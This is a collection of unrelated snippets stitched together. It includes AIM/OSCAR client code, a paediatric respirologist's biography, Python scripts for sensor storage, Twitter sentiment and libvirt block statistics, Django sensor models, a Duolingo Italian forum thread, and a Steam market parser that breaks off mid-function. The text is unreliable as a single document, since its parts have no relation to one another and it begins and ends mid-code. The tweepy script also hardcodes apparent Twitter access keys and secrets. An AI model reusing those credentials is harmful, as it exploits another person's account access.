TLV(TLV_CLIENTMINOR,"\000\010")+ TLV(0x0019,"\000\000")+ TLV(TLV_CLIENTSUB,"\x0A\xE6")+ TLV(0x0014,"\x00\x00\x00\xBB")+ TLV(TLV_LANG,"en")+ TLV(TLV_COUNTRY,"us")+ TLV(TLV_USESSI,"\001"))) return "Cookie" def oscar_Cookie(self,data): snac=readSNAC(data[1]) if self.icq: i=snac[5].find("\000") snac[5]=snac[5][i:] tlvs=readTLVs(snac[5]) if tlvs.has_key(6): self.cookie=tlvs[6] server,port=string.split(tlvs[5],":") d = self.connectToBOS(server, int(port)) d.addErrback(lambda x: log.msg("Connection Failed! Reason: %s" % x)) if self.deferred: d.chainDeferred(self.deferred) self.disconnect() elif tlvs.has_key(8): errorcode=tlvs[8] errorurl=tlvs[4] if errorcode=='\000\030': error="You are attempting to sign on again too soon. Please try again later." elif errorcode=='\000\005': error="Invalid Username or Password." else: error=repr(errorcode) self.error(error,errorurl) else: log.msg('hmm, weird tlvs for %s cookie packet' % str(self)) log.msg(tlvs) log.msg('snac') log.msg(str(snac)) return "None" def oscar_None(self,data): pass def connectToBOS(self, server, port): c = protocol.ClientCreator(reactor, self.BOSClass, self.username, self.cookie) return c.connectTCP(server, int(port)) def error(self,error,url): log.msg("ERROR! 
%s %s" % (error,url)) if self.deferred: self.deferred.errback((error,url)) self.transport.loseConnection() FLAP_CHANNEL_NEW_CONNECTION = 0x01 FLAP_CHANNEL_DATA = 0x02 FLAP_CHANNEL_ERROR = 0x03 FLAP_CHANNEL_CLOSE_CONNECTION = 0x04 SERVICE_CHATNAV = 0x0d SERVICE_CHAT = 0x0e serviceClasses = { SERVICE_CHATNAV:ChatNavService, SERVICE_CHAT:ChatService } TLV_USERNAME = 0x0001 TLV_CLIENTNAME = 0x0003 TLV_COUNTRY = 0x000E TLV_LANG = 0x000F TLV_CLIENTMAJOR = 0x0017 TLV_CLIENTMINOR = 0x0018 TLV_CLIENTSUB = 0x001A TLV_PASSWORD = 0x0025 TLV_USESSI = 0x004A CAP_ICON = '\011F\023FL\177\021\321\202"DEST\000\000' CAP_VOICE = '\011F\023AL\177\021\321\202"DEST\000\000' CAP_IMAGE = '\011F\023EL\177\021\321\202"DEST\000\000' CAP_CHAT = 't\217$ b\207\021\321\202"DEST\000\000' CAP_GET_FILE = '\011F\023HL\177\021\321\202"DEST\000\000' CAP_SEND_FILE = '\011F\023CL\177\021\321\202"DEST\000\000' CAP_GAMES = '\011F\023GL\177\021\321\202"DEST\000\000' CAP_SEND_LIST = '\011F\023KL\177\021\321\202"DEST\000\000' CAP_SERV_REL = '\011F\023IL\177\021\321\202"DEST\000\000'
Dr. Reshma Amin joined The Hospital for Sick Children (SickKids) in July 2010 as a clinical investigator in the Division of Respiratory Medicine and Assistant Professor at the University of Toronto. Dr. Amin completed a degree in Biology at the University of Western Ontario prior to graduating from medical school at the University of Toronto in 2002. She completed her paediatric residency training in Toronto. This was followed by a two-year respiratory medicine fellowship at SickKids. She subsequently completed a Master’s of Science degree in a graduate program in Clinical Epidemiology at the University of Toronto concurrently with a research fellowship. She completed a three-month observership in Sleep Medicine at the Children's Hospital of Philadelphia. At present, Dr. Amin's main research focus is the assessment of quality of life and the identification of the limitations of care within the mechanically ventilated paediatric population. This is a rapidly expanding population, and its characterization, as well as the identification of the burden of disease for these children, is currently lacking. In addition, she is interested in the development of early outcome measures to assess interventions in children with Cystic Fibrosis, in particular the Lung Clearance Index (LCI) as well as Positron Emission Tomography (PET) imaging.
# -*- coding: utf-8 -*- """ Created by Filip Jorissen This function stores sensor measurement data. For each sensor two files are created. Sensor.meta contains metadata about the measurements. Sensor.txt contains the actual measurements: only the measurements. The location of the measurement in the file indicates the time at which it was measured. If an existing measurement is already stored, data is appended and overwritten. TODO: add conditions to check for illegal operations: too long file, ... """ import os, io import json def storeTimeSeriesData(data, sensor, token, unit): resultpath="results" metapath=resultpath +"/"+ sensor + ".meta" datapath=resultpath +"/"+ sensor + ".txt" datalength=6 #create results folder if it does not exist if not os.path.exists(resultpath): os.makedirs(resultpath) if os.path.exists(metapath): # load existing meta file with open(metapath, 'rb') as fp: metadata = json.load(fp) # set write mode to read and overwrite mode = 'r+b' #check for inconsistencies if metadata['sensor'] != sensor or metadata['token'] != token or metadata['unit'] != unit or metadata['datalength'] != datalength: raise ValueError('Argument is inconsistent with its stored value') if (data[0][0]- metadata['starttime']) % 60 != 0: print("Timestamp does not have the correct spacing compared to the initial timestamp! Storage cancelled.") return else: #create new meta file metadata=dict() metadata['starttime']=data[0][0] metadata['sensor']=sensor metadata['token']=token metadata['unit']=unit metadata['resolution']='minute' #need to edit factors '60' below when this is changed! metadata['datalength']=datalength metadata['separator']=' ' metadata['edittimes']=[] # set write mode to write mode='wb' #append the unix timestamp to indicate which values were overwritten/added metadata['edittimes'].append(data[0][0]) #raise an exception when data measurements happened before the currently first measurement of the file if data[0][0]<metadata['starttime']: raise ValueError('The added data cannot be appended before the start of the file') # insert new data at the correct point in the file entrylength=metadata['datalength'] + len(metadata['separator']) with open(datapath, mode) as fp: startIndex=(data[0][0]-metadata['starttime'])/60*entrylength fp.seek(0, os.SEEK_END) filesize = fp.tell() #if the file has been untouched for too long: append dummy data if filesize < startIndex: fp.write(("???".zfill(metadata['datalength']) + metadata['separator'])*((startIndex - filesize)/entrylength)) fp.seek(startIndex,0) for row in data: fp.write(str(row[1]).zfill(metadata['datalength'])+ metadata['separator']) # save (updated) meta data file with open(metapath, 'wb') as fp: json.dump(metadata, fp)
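A minimal usage sketch (not part of the original module) may help illustrate the position-encoded layout described in the docstring. The readings below are invented, and the sensor name, token and unit are placeholders; the data argument is assumed to be a list of [unix_timestamp, value] pairs spaced one minute apart, as the modulo-60 check above requires.

# Hypothetical example data: two readings taken one minute apart.
measurements = [
    [1400000000, 21],  # unix timestamp, sensor value
    [1400000060, 22],  # exactly 60 s later, as the modulo-60 check expects
]

# Placeholder sensor name, token and unit; adjust to your own setup.
storeTimeSeriesData(measurements, 'livingroom_temp', 'example-token', 'degC')

# Afterwards results/livingroom_temp.txt holds the zero-padded 6-character
# values ("000021 000022 ") and results/livingroom_temp.meta the JSON metadata.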
Our Personal and Family Solutions are designed to help busy, successful families manage their finances and grow their wealth with confidence and peace of mind. We provide individual tax compliance and consulting, asset protection services, wealth transfer planning, and a robust family office solution. Our personal services are designed to work together with our business solutions, allowing us to partner with clients and coordinate business and personal planning in order to meet their most important goals.
#!/usr/bin/env python from setuptools import setup, find_packages # Shamelessly stolen (then modified) from https://github.com/cburgmer/pdfserver/blob/master/setup.py def parse_requirements(file_name): import re requirements = [] for line in open(file_name, 'r').read().split('\n'): if re.match(r'(\s*#)|(\s*$)', line): continue # if re.match(r'\s*-e\s+', line): m = re.search(r"(git(?:\+\w{3})?|https?|svn)://.+#egg=(.*)$", line) if m: # FIXME: Can't install packages from source repos right now if 'http' in m.group(1): # Distutils can install Http served packages right now # FIXME: Skip this now # requirements.append(m.group(2)) pass pass elif re.match(r'\s*-f\s+', line): pass elif re.match(r'\s*-i\s+', line): pass else: requirements.append(line) return requirements def parse_dependency_links(file_name): import re dependency_links = [] for line in open(file_name, 'r').read().split('\n'): if re.match(r'\s*-[ef]\s+', line): dependency_links.append(re.sub(r'\s*-[ef]\s+', '', line)) continue m = re.search(r"((?:git(?:\+ssh)|http|svn)://.+#egg=.*)$", line) if m: dependency_links.append(m.group(1)) return dependency_links params = dict( name='API Example', packages=find_packages(), install_requires=parse_requirements('requirements.txt'), dependency_links=parse_dependency_links('requirements.txt'), entry_points={ 'console_scripts': [ ] }, ) setup(**params)
Build It Right Carpentry, LLC can be found in Oconomowoc. The following is offered: General Contractors, Residential Contractors, Carpenters, Bathroom Remodeling, Patio & Deck. In Oconomowoc there are 14 other General Contractors. An overview can be found here.
#code to save tweets in json import sys import tweepy import json import csv from textblob import TextBlob import os import time from datetime import datetime from threading import Timer access_key = "2864513512-1JkMkwIRHMjSBLdNgh1zIGiSX2ZJMnhoZZ3b8uR" access_secret = "vpBlz4E2eSZnw7TVlUAGcmwI4AZ6Hf2Z9CBhin3S7HZSl" consumer_key = "50n8PRe0MTuC6NyYEqUqnwJsf" consumer_secret = "ZCFFAbNZfJqwsM1QuPPPBC5ahSX3F8Xsm3PVY4p0PKexO89ygt" def impactScore(follows, retwt_count, fav_count): #Users with many followers will report an impact score close to the # of retweets #Users with very few followers, have their impact score re-scaled to reflect the minimal penetration of their retweeting impact = 0.0 try: impact = (retwt_count * follows) / (follows + retwt_count + fav_count) except ZeroDivisionError: impact = 0.0 else: impact = (retwt_count * follows) / (follows + retwt_count + fav_count) return impact def analysis(js): twt=json.loads(js) if(twt['lang']=='en'): txt=twt['text'] #check if this is a retweet try: retwt_count=twt['retweeted_status']['retweet_count'] #if it is, return its retweet count except KeyError: retwt_count=twt['retweet_count'] #otherwise return the original tweet's retweet count else: retwt_count=twt['retweeted_status']['retweet_count'] #do the same for favorites try: fav_count=twt['retweeted_status']['favorite_count'] except KeyError: fav_count=twt['favorite_count'] else: fav_count=twt['retweeted_status']['favorite_count'] follows=twt['user']['followers_count'] username=twt['user']['screen_name'] blob=TextBlob(txt) pol=blob.sentiment.polarity print "Posted by ",username print "Seen by ",follows," users" print "Favorited by ",fav_count," users" print "Retweeted by ",retwt_count, " users" print "Polarity : ",blob.sentiment.polarity score = impactScore(follows, retwt_count, fav_count) print "Impact Score is ",score #print "Average Polarity: ",avgpol #print "Magnification : ",retwt_count + fav_count raw_input("Continue.") #time.delay(1) class CustomStreamListener(tweepy.StreamListener): def on_status(self, status): print status.text def on_data(self, data): analysis(data) def on_error(self, status_code): print >> sys.stderr, 'Encountered error with status code:', status_code return True # Don't kill the stream def on_timeout(self): print >> sys.stderr, 'Timeout...' return True #Don't kill the stream keyword=raw_input("Please Enter a Keyword: ") auth=tweepy.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_key, access_secret) api=tweepy.API(auth) while True: engine=tweepy.streaming.Stream(auth, CustomStreamListener()) engine.filter(track=list([keyword])) #engine.filter(track=['Nike'])
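To make the weighting described in the impactScore comments concrete, here is a small illustrative call with made-up follower, retweet and favourite counts (none of these numbers come from real tweets):

# Illustrative numbers only.
big_account = impactScore(follows=1000, retwt_count=50, fav_count=10)
print(big_account)    # about 47: close to the raw retweet count of 50

small_account = impactScore(follows=10, retwt_count=50, fav_count=10)
print(small_account)  # about 7: the same 50 retweets, heavily scaled down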
Ink Depot offers a great range of Toner Cartridges for your Dell 3115 3115CN device, with high quality products at very competitive prices. We offer a 100% money back guarantee for all consumables you have purchased from us, and with 98% of our advertised products in stock, you can be assured of speedy delivery. Your Dell 3115 3115CN takes the following Toner Cartridges / Accessories: 3110 Black, 3110 Cyan, 3110 Magenta, 3110 Yellow. All products sold by Ink Depot are supported by a 100% money back guarantee. If you are not entirely satisfied with the performance of your 3115 3115CN printer consumables, then we will gladly offer you a refund, credit or replacement. This guarantee is valid for up to 90 days after the date of your purchase. For further details about the terms and conditions of this guarantee offered by Ink Depot, please see our returns policy. How fast will your Dell 3115 3115CN consumables be delivered to you? If you are looking for an updated driver or an instruction / user manual for your 3115 3115CN printing device, please check the manufacturer's website.
from django.db import models from django.utils import timezone from django.contrib.contenttypes.models import ContentType from django.contrib.contenttypes.generic import GenericForeignKey class GeoLocation(models.Model): latitude = models.FloatField() longitude = models.FloatField() elevation = models.FloatField(null=True, blank=True) class Metadata(models.Model): '''Metadata assoicated with a site, a device, or a sensor''' content_type = models.ForeignKey(ContentType) object_id = models.PositiveIntegerField() content_object = GenericForeignKey('content_type', 'object_id') key = models.CharField(max_length=255) value = models.TextField(blank=True) timestamp = models.DateTimeField(default=timezone.now, blank=True) class Site(models.Model): '''An installation of Chain API, usually on the scale of several or many buildings. Sites might be hosted on a remote server, in which case the URL field will point to that resource on that server. If the site is hosted locally the URL can be blank''' name = models.CharField(max_length=255) url = models.CharField(max_length=255, default='', blank=True) geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) raw_zmq_stream = models.CharField(max_length=255, default='', blank=True) def __repr__(self): return 'Site(name=%r)' % (self.name) def __str__(self): return self.name class Device(models.Model): '''A set of co-located sensors, often sharing a PCB''' name = models.CharField(max_length=255) site = models.ForeignKey(Site, related_name='devices') description = models.TextField(blank=True) building = models.CharField(max_length=255, blank=True) floor = models.CharField(max_length=10, blank=True) room = models.CharField(max_length=255, blank=True) geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) active = models.BooleanField(default=True) class Meta: unique_together = ['site', 'name', 'building', 'floor', 'room'] ordering = ["name"] def __repr__(self): return ('Device(site=%r, name=%r, description=%r, building=%r, ' + 'floor=%r, room=%r)') % ( self.site, self.name, self.description, self.building, self.floor, self.room) def __str__(self): return self.name class Unit(models.Model): '''A unit used on a data point, such as "m", or "kWh"''' name = models.CharField(max_length=30, unique=True) def __repr__(self): return 'Unit(name=%r)' % self.name def __str__(self): return self.name class Metric(models.Model): '''A metric that might be measured, such as "temperature" or "humidity". This is used to tie together a set of ScalarData points that are all measuring the same thing.''' name = models.CharField(max_length=255, unique=True) def __repr__(self): return 'Metric(name=%r)' % self.name def __str__(self): return self.name class ScalarSensor(models.Model): '''An individual sensor. There may be multiple sensors on a single device. 
The metadata field is used to store information that might be necessary to tie the Sensor data to the physical Sensor in the real world, such as a MAC address, serial number, etc.''' device = models.ForeignKey(Device, related_name='sensors') metric = models.ForeignKey(Metric, related_name='sensors') unit = models.ForeignKey(Unit, related_name='sensors') metadata = models.CharField(max_length=255, blank=True) geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) active = models.BooleanField(default=True) class Meta: unique_together = ['device', 'metric'] def __repr__(self): return 'Sensor(device=%r, metric=%r, unit=%r)' % ( self.device, self.metric, self.unit) def __str__(self): return self.metric.name class Person(models.Model): '''A Person involved with the site. Some sensors might detect presence of a person, so they can reference this model with person-specific information''' first_name = models.CharField(max_length=255) last_name = models.CharField(max_length=255) picture_url = models.CharField(max_length=255, blank=True) twitter_handle = models.CharField(max_length=255, blank=True) rfid = models.CharField(max_length=255, blank=True) site = models.ForeignKey(Site, related_name='people') geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) class Meta: verbose_name_plural = "people" def __repr__(self): return ('Person(first_name=%s, last_name=%s, picture_url=%s, ' + 'twitter_handle=%s, rfid=%s)') % ( self.first_name, self.last_name, self.picture_url, self.twitter_handle, self.rfid) def __str__(self): return " ".join([self.first_name, self.last_name]) class PresenceSensor(models.Model): '''An individual sensor. There may be multiple sensors on a single device. The metadata field is used to store information that might be necessary to tie the Sensor data to the physical Sensor in the real world, such as a MAC address, serial number, etc.''' device = models.ForeignKey(Device, related_name='presence_sensors') metric = models.ForeignKey(Metric, related_name='presence_sensors') # unit = models.ForeignKey(Unit, related_name='sensors') metadata = models.CharField(max_length=255, blank=True) geo_location = models.OneToOneField(GeoLocation, null=True, blank=True) class Meta: unique_together = ['device', 'metric'] def __repr__(self): return 'PresenceSensor(device=%r, id=%r)' % ( self.device, self.id) def __str__(self): return str(self.metric) # self.metric.name class PresenceData(models.Model): '''Sensor data indicating that a given Person was detected by the sensor at the given time, for instance using RFID or face recognition. Note that this is also used to indicate that a person was NOT seen by a given sensor by setting present=False. Typically a Presence sensor should indicate once when a person is first detected, then again when they are first absent.''' sensor = models.ForeignKey(PresenceSensor, related_name='presence_data') timestamp = models.DateTimeField(default=timezone.now, blank=True) person = models.ForeignKey(Person, related_name='presense_data') present = models.BooleanField(default=None) class Meta: verbose_name_plural = "presence data" def __repr__(self): return ('PresenceData(timestamp=%r, sensor=%r, ' + 'person=%r, present=%r)') % ( self.timestamp, self.sensor, self.person, self.present) def __str__(self): return '%s %spresent' % (self.person, 'not ' if not self.present else '') class StatusUpdate(models.Model): '''Status updates for people, such as tweets, facebook status updates, etc. 
This is probably outside of the scope of a general system for tracking sensor data, but is included here for simplicity with the actual deployments of DoppelLab. If we deploy this as a generic tool we may want to strip this out.''' timestamp = models.DateTimeField(default=timezone.now, blank=True) person = models.ForeignKey(Person, related_name='status_updates') status = models.TextField()
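A hedged sketch of how the models above fit together, run from a Django shell with this app installed and migrated; the import path, names and values are all invented for illustration.

```python
# from <your_app>.models import Site, Device, Metric, Unit, ScalarSensor, Metadata
from django.utils import timezone

site = Site.objects.create(name="Example Campus",
                           url="http://chain.example.com/sites/1")
device = Device.objects.create(site=site, name="Sensor Node 12",
                               building="E14", floor="5", room="507")
metric = Metric.objects.create(name="temperature")
unit = Unit.objects.create(name="C")
sensor = ScalarSensor.objects.create(device=device, metric=metric, unit=unit,
                                     metadata="MAC 00:11:22:33:44:55")

# Generic metadata can hang off a Site, Device or Sensor through the
# content-type fields on the Metadata model.
Metadata.objects.create(content_object=device, key="firmware",
                        value="1.4.2", timestamp=timezone.now())
```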
extropians: Did Dung Beetles Kill The Mushroom?

> mycelium incubation to fruiting takes 2 weeks minimum.
#!/usr/bin/env python """Tests for util.py.""" import datetime import logging import os import sys import unittest # Fix up paths for running tests. sys.path.insert(0, "../src/") from pipeline import util from google.appengine.api import taskqueue class JsonSerializationTest(unittest.TestCase): """Test custom json encoder and decoder.""" def testE2e(self): now = datetime.datetime.now() obj = {"a": 1, "b": [{"c": "d"}], "e": now} new_obj = util.json.loads(util.json.dumps( obj, cls=util.JsonEncoder), cls=util.JsonDecoder) self.assertEquals(obj, new_obj) class GetTaskTargetTest(unittest.TestCase): def setUp(self): super(GetTaskTargetTest, self).setUp() os.environ["CURRENT_VERSION_ID"] = "v7.1" os.environ["CURRENT_MODULE_ID"] = "foo-module" def testGetTaskTarget(self): self.assertEqual("v7.foo-module", util._get_task_target()) task = taskqueue.Task(url="/relative_url", target=util._get_task_target()) self.assertEqual("v7.foo-module", task.target) def testGetTaskTargetDefaultModule(self): os.environ["CURRENT_MODULE_ID"] = "default" self.assertEqual("v7", util._get_task_target()) task = taskqueue.Task(url="/relative_url", target=util._get_task_target()) self.assertEqual("v7", task.target) if __name__ == '__main__': logging.getLogger().setLevel(logging.DEBUG) unittest.main()
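The tests above exercise `util._get_task_target()`, which combines the App Engine major version with the module name. The sketch below is illustrative only, not the real implementation in `pipeline/util.py`; it just mirrors the mapping the assertions expect ("v7.1" + "foo-module" -> "v7.foo-module", default module -> "v7").

```python
import os

def get_task_target_sketch():
    """Illustration of the convention checked by the tests above."""
    major = os.environ["CURRENT_VERSION_ID"].split(".")[0]
    module = os.environ.get("CURRENT_MODULE_ID", "default")
    if module == "default":
        return major
    return "%s.%s" % (major, module)

os.environ["CURRENT_VERSION_ID"] = "v7.1"
os.environ["CURRENT_MODULE_ID"] = "foo-module"
assert get_task_target_sketch() == "v7.foo-module"
```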
#!/usr/bin/env python
# To test domain block device statistics

import os
import sys
import time
import libxml2

import libvirt
from libvirt import libvirtError

from src import sharedmod

required_params = ('guestname',)
optional_params = {}


def check_guest_status(domobj):
    """Check guest current status"""
    state = domobj.info()[0]
    if state == libvirt.VIR_DOMAIN_SHUTOFF or state == libvirt.VIR_DOMAIN_SHUTDOWN:
        # guest is not running
        return False
    else:
        return True


def check_blkstats():
    """Check block device statistic result"""
    pass


def blkstats(params):
    """Domain block device statistic"""
    logger = params['logger']
    guestname = params['guestname']

    conn = sharedmod.libvirtobj['conn']
    domobj = conn.lookupByName(guestname)

    # Start the domain if it is not already running
    if not check_guest_status(domobj):
        domobj.create()
        time.sleep(90)

    try:
        xml = domobj.XMLDesc(0)
        doc = libxml2.parseDoc(xml)
        cont = doc.xpathNewContext()
        devs = cont.xpathEval("/domain/devices/disk/target/@dev")
        path = devs[0].content
        blkstats = domobj.blockStats(path)
    except libvirtError, e:
        logger.error("API error message: %s, error code is %s"
                     % (e.message, e.get_error_code()))
        return 1

    if blkstats:
        # check_blkstats()
        logger.debug(blkstats)
        logger.info("%s rd_req %s" % (path, blkstats[0]))
        logger.info("%s rd_bytes %s" % (path, blkstats[1]))
        logger.info("%s wr_req %s" % (path, blkstats[2]))
        logger.info("%s wr_bytes %s" % (path, blkstats[3]))
    else:
        logger.error("failed to get domain block statistics\n")
        return 1

    return 0
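In libvirt's Python bindings, `blockStats()` returns a 5-tuple of counters; the indices used above correspond to read/write requests and bytes, with an error count at the end. A standalone sketch outside the test framework, where the connection URI, guest name and disk target are assumptions:

```python
import libvirt

conn = libvirt.open("qemu:///system")
dom = conn.lookupByName("some-guest")   # hypothetical guest name
rd_req, rd_bytes, wr_req, wr_bytes, errs = dom.blockStats("vda")
print("reads : %d requests / %d bytes" % (rd_req, rd_bytes))
print("writes: %d requests / %d bytes" % (wr_req, wr_bytes))
print("errors: %d" % errs)
conn.close()
```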
One of the systematic issues with Duo for me is the lack of the 'polite' you. If you do not know someone well, then you don't use the 'tu' form of the verb, tu capisci, but the polite form Lei capisce (written with a capital). Or so I have read. Anyway, Lei capisce la ricetta is presently rejected by Duo. So we get the habit of using the familiar form all the time. But maybe my sources are outdated and this is OK?

Apparently it's no longer common to write the polite "lei" with a capital. This form gets introduced in later lessons and I think it's accepted thereafter.

What DL is rejecting is not "Lei" but "capisce". Since at this point "Lei" has not yet been introduced as a formal "You", I guess that is the reason why it's being rejected, even though it's just as valid to use "capisce".

Duo uses capitals in the lesson you refer to. There is only one on "Formal You" and it actually has more on formal greetings, salve instead of ciao. Interesting what you say about the capitals though - I wonder if tu is becoming more widespread. I bet ciao is. That's the internet.

I wrote what you write many times and I tried to correct them. Nothing to do. Not only that: some "expert" wrote that "egli", for instance, is like the E. "thou"... Be sure: they will not learn the lesson.

Why can I not use 'comprendi' here?

I'm not sure what the difference is between comprendere and capire. Both can mean "to understand," but only one is acceptable as an answer here?

Why "tu" and not "voi"?

Riuscire is surely the correct verb here?

Fun fact: the word used here, "capisci" (you understand), is where the term "capeesh?!" derives from. Literally meaning "do you understand?"

Seems whoever devises the Italian sentences has an odd conviction that the "voi" form is simply inappropriate for particular contexts. Surely, I could be telling more than one person at a given time that they all understand the recipe, say, if I were conducting a cooking class.

Why can't I say "te capi la ricetta"?
#!/usr/bin/env python # -*- coding: utf-8 -*- import time import pygame from fx5204ps import FX5204PS GRAPH_WIDTH = 600 GRAPH_HEIGHT = 100 SCREEN_SIZE = (GRAPH_WIDTH + 200, (GRAPH_HEIGHT + 50) * 4 + 50) BLACK = (0,0,0) WHITE = (255,255,255) RED = (255,0,0) GREEN = (0,255,0) BLUE = (0,0,255) class Graph(object): def __init__(self, screen, pos, index): self._screen = screen self._x = pos[0] self._y = pos[1] self._index = index self._watt_history = [0] * GRAPH_WIDTH self._avg_history = [0] * GRAPH_WIDTH self._max_history = [0] * GRAPH_WIDTH self._scale = 1.0 self._font = pygame.font.SysFont(None, 24) def _draw_line(self, history, color): for t in range(1, GRAPH_WIDTH - 1): x0 = t - 1 + self._x y0 = (GRAPH_HEIGHT - history[t - 1] * self._scale + self._y) x1 = t + self._x y1 = (GRAPH_HEIGHT - history[t] * self._scale + self._y) pygame.draw.line(self._screen, color, (x0, y0), (x1, y1)) def draw(self): self._draw_line(self._max_history, RED) self._draw_line(self._watt_history, BLUE) self._draw_line(self._avg_history, GREEN) pygame.draw.line(self._screen, WHITE, (self._x, self._y), (self._x, self._y + GRAPH_HEIGHT)) pygame.draw.line(self._screen, WHITE, (self._x, self._y + GRAPH_HEIGHT), (self._x + GRAPH_WIDTH, self._y + GRAPH_HEIGHT)) max_text = self._font.render( 'Max: {0} W'.format(self._max_history[-1]), True, RED) self._screen.blit(max_text, (self._x + GRAPH_WIDTH, self._y)) avg_text = self._font.render( 'Avg: {0} W'.format(self._avg_history[-1]), True, GREEN) self._screen.blit(avg_text, (self._x + GRAPH_WIDTH, self._y + 30)) watt_text = self._font.render( 'Watt: {0} W'.format(self._watt_history[-1]), True, BLUE) self._screen.blit(watt_text, (self._x + GRAPH_WIDTH, self._y + 60)) y_zero_text = self._font.render('0', True, WHITE) w = y_zero_text.get_rect().width self._screen.blit(y_zero_text, (self._x - w, self._y + GRAPH_HEIGHT)) y_max_text = self._font.render( '{0} W'.format(int(GRAPH_HEIGHT / self._scale)), True, WHITE) w = y_max_text.get_rect().width self._screen.blit(y_max_text, (self._x - w, self._y)) title_text = self._font.render('Port {0}'.format(self._index), True, WHITE) self._screen.blit(title_text, (self._x + 20, self._y - 20)) def update(self, watt, watt_avg, watt_max): self._max_history.pop(0) self._max_history.append(watt_max) self._watt_history.pop(0) self._watt_history.append(watt) self._avg_history.pop(0) self._avg_history.append(watt_avg) max_in_history = max(self._max_history) if max_in_history > GRAPH_HEIGHT: self._scale = GRAPH_HEIGHT / max_in_history else: self._scale = 1.0 def draw_graph(fx): pygame.init() pygame.display.set_caption('FX5204PS Status') clock = pygame.time.Clock() screen = pygame.display.set_mode(SCREEN_SIZE) font = pygame.font.SysFont(None, 24) graphs = [] for i in range(4): graphs.append(Graph(screen, (60, (GRAPH_HEIGHT + 50) * i + 50), i)) while True: clock.tick(10) screen.fill(BLACK) watt = fx.wattage watt_avg = fx.wattage_avg watt_max = fx.wattage_max for i in range(4): graphs[i].update(watt[i], watt_avg[i], watt_max[i]) graphs[i].draw() freq = fx.frequency volt = fx.voltage temp = fx.temperature status_text = font.render( 'Volt:{0} V, Freq: {1} Hz, Temp: {2} C'.format( volt, freq, temp), True, WHITE) screen.blit(status_text, (0, 0)) pygame.display.update() for event in pygame.event.get(): if event.type == pygame.QUIT: return if __name__ == '__main__': fx = FX5204PS(sumup_interval=10) fx.start() draw_graph(fx) fx.stop()
Compare Prices From Buena Vista Limousine Companies and Save Up To 25% On Rentals! Did you know that we are the go-to resource for limousine services in your city? Price4Limo has access to the largest fleet of limousine rentals in the Buena Vista, MI area, including makes and models such as Chrysler, Lincoln, Mercedes, BMW, Ford, & Chevrolet. Most limousine rentals have incredible amenities for your enjoyment.
import decimal import os import copy import struct import urllib.parse as urlparse import re from requests.structures import CaseInsensitiveDict from typing import List from bs4 import BeautifulSoup, Tag from steampy.models import GameOptions def text_between(text: str, begin: str, end: str) -> str: start = text.index(begin) + len(begin) end = text.index(end, start) return text[start:end] def texts_between(text: str, begin: str, end: str): stop = 0 while True: try: start = text.index(begin, stop) + len(begin) stop = text.index(end, start) yield text[start:stop] except ValueError: return def account_id_to_steam_id(account_id: str) -> str: first_bytes = int(account_id).to_bytes(4, byteorder='big') last_bytes = 0x1100001.to_bytes(4, byteorder='big') return str(struct.unpack('>Q', last_bytes + first_bytes)[0]) def steam_id_to_account_id(steam_id: str) -> str: return str(struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0]) def parse_price(price: str) -> decimal.Decimal: pattern = '\D?(\\d*)(\\.|,)?(\\d*)' tokens = re.search(pattern, price, re.UNICODE) decimal_str = tokens.group(1) + '.' + tokens.group(3) return decimal.Decimal(decimal_str) def merge_items_with_descriptions_from_inventory(inventory_response: dict, game: GameOptions) -> dict: inventory = inventory_response.get('assets', []) if not inventory: return {} descriptions = {get_description_key(description): description for description in inventory_response['descriptions']} return merge_items(inventory, descriptions, context_id=game.context_id) def merge_items_with_descriptions_from_offers(offers_response: dict) -> dict: descriptions = {get_description_key(offer): offer for offer in offers_response['response'].get('descriptions', [])} received_offers = offers_response['response'].get('trade_offers_received', []) sent_offers = offers_response['response'].get('trade_offers_sent', []) offers_response['response']['trade_offers_received'] = list( map(lambda offer: merge_items_with_descriptions_from_offer(offer, descriptions), received_offers)) offers_response['response']['trade_offers_sent'] = list( map(lambda offer: merge_items_with_descriptions_from_offer(offer, descriptions), sent_offers)) return offers_response def merge_items_with_descriptions_from_offer(offer: dict, descriptions: dict) -> dict: merged_items_to_give = merge_items(offer.get('items_to_give', []), descriptions) merged_items_to_receive = merge_items(offer.get('items_to_receive', []), descriptions) offer['items_to_give'] = merged_items_to_give offer['items_to_receive'] = merged_items_to_receive return offer def merge_items_with_descriptions_from_listing(listings: dict, ids_to_assets_address: dict, descriptions: dict) -> dict: for listing_id, listing in listings.get("sell_listings").items(): asset_address = ids_to_assets_address[listing_id] description = descriptions[asset_address[0]][asset_address[1]][asset_address[2]] listing["description"] = description return listings def merge_items(items: List[dict], descriptions: dict, **kwargs) -> dict: merged_items = {} for item in items: description_key = get_description_key(item) description = copy.copy(descriptions[description_key]) item_id = item.get('id') or item['assetid'] description['contextid'] = item.get('contextid') or kwargs['context_id'] description['id'] = item_id description['amount'] = item['amount'] merged_items[item_id] = description return merged_items def get_market_listings_from_html(html: str) -> dict: document = BeautifulSoup(html, "html.parser") nodes = 
document.select("div[id=myListings]")[0].findAll("div", {"class": "market_home_listing_table"}) sell_listings_dict = {} buy_orders_dict = {} for node in nodes: if "My sell listings" in node.text: sell_listings_dict = get_sell_listings_from_node(node) elif "My listings awaiting confirmation" in node.text: sell_listings_awaiting_conf = get_sell_listings_from_node(node) for listing in sell_listings_awaiting_conf.values(): listing["need_confirmation"] = True sell_listings_dict.update(sell_listings_awaiting_conf) elif "My buy orders" in node.text: buy_orders_dict = get_buy_orders_from_node(node) return {"buy_orders": buy_orders_dict, "sell_listings": sell_listings_dict} def get_sell_listings_from_node(node: Tag) -> dict: sell_listings_raw = node.findAll("div", {"id": re.compile('mylisting_\d+')}) sell_listings_dict = {} for listing_raw in sell_listings_raw: spans = listing_raw.select("span[title]") listing = { "listing_id": listing_raw.attrs["id"].replace("mylisting_", ""), "buyer_pay": spans[0].text.strip(), "you_receive": spans[1].text.strip()[1:-1], "created_on": listing_raw.findAll("div", {"class": "market_listing_listed_date"})[0].text.strip(), "need_confirmation": False } sell_listings_dict[listing["listing_id"]] = listing return sell_listings_dict def get_market_sell_listings_from_api(html: str) -> dict: document = BeautifulSoup(html, "html.parser") sell_listings_dict = get_sell_listings_from_node(document) return {"sell_listings": sell_listings_dict} def get_buy_orders_from_node(node: Tag) -> dict: buy_orders_raw = node.findAll("div", {"id": re.compile('mybuyorder_\\d+')}) buy_orders_dict 